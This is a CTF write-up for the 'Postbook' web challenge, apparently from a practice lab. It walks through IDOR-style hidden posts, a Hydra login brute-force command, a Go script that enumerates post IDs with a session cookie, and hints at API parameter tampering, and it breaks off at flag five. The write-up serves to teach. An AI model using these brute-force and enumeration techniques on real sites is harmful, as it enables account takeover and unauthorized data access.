Postbook

05/27/20193 Min Read — In CTF

CTF time !! Let's find flags.

alt text

Hidden Page ~ 🚩(1/7)

Log in to the app using a newly created account, we can see home page like alt text

Clicking two posts below, we can see their URLs

  1. http://35.190.155.168/7d9c59055d/index.php?page=view.php&id=3
  2. http://35.190.155.168/7d9c59055d/index.php?page=view.php&id=1

Hmm...where is page with id equal to 2 ?
Then we got the first flag from the hidden page.

Brute Force Attack Login Form ~ 🚩(2/7)

Let's use Hydra to crack password for account "user".

First, by providing random password to username='user', we got the response page alt text

Then, we can use the command as follow to do brute force attack

hydra -V -l user -P passlist.txt 35.190.155.168 http-form-post "/7d9c59055d/index.php?page=sign_in.php:username=^USER^&password=^PASS^&submit=Submit:Nothing is logged"
.
-V verbose mode
-l specify username here
-P given password list file path

Before running this command, we need to get a password list file (ex: File Link)
Noted that, 'Submit:Nothing is logged' tells Hydra the error message in the response HTML. alt text

Bingo !! We got the password for 'user' is 'password'.
Log in with this credential then we can get the flag.

Mining Hidden Post ID ~ 🚩(3/7)

This flag was hidden in a post page with very large ID.
So we need to write a simple program to find the flag.
Below is a simple go program

package main

import (
	"fmt"
	"io/ioutil"
	"log"
	"net/http"
	"strings"
)

const URL string = "http://34.74.105.127/2e79c1ae35/index.php?page=view.php&id=%d"
const COOKIE string = "id=c81e728d9d4c2f636f067f89cc14862c"
const CONTENT_LENGTH int = 1414

func makeRange(min, max int) []int {
	a := make([]int, max-min+1)
	for i := range a {
		a[i] = min + i
	}
	return a
}

func makeRequest(url string, ch chan<- string) {
	client := &http.Client{}

	// Declare HTTP Method and Url
	req, err := http.NewRequest("GET", url, nil)

	// Set cookie
	req.Header.Set("Cookie", COOKIE)
	resp, err := client.Do(req)
	defer resp.Body.Close()
	// Read response
	data, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		log.Fatalln(err)
	}
	if len(data) > CONTENT_LENGTH {
		ch <- string(data)
	} else {
		ch <- fmt.Sprintf("Not Found at url = %s", url)
	}

}

func main() {
	ids := makeRange(500, 1000)
	ch := make(chan string)
	for _, id := range ids {
		url := fmt.Sprintf(URL, id)
		go makeRequest(url, ch)
	}
	for range ids {
		output := <-ch
		if !strings.Contains(output, "Not Found") {
			fmt.Println(output)
		}
	}
}

In this case, once the client visit post with id = 945, the flag will show up

Mess Up Bad Design API, Part I ~ 🚩(4/7)

Now let's try to edit a post by clicking 'edit' and then 'save' buttons.
We can see a post request was sent from the client side with the URL below. http://34.74.105.127/2e79c1ae35/index.php?page=edit.php&id=3
Interestingly, some unnecessary params were attached on the URL (id).
What if we resend the POST request without specifying id ?

Mess Up Bad Design API, Part II ~ 🚩(5/7)

Coming Soon...

© 2020 by Warren. All rights reserved.
Last build: 11/28/2021
;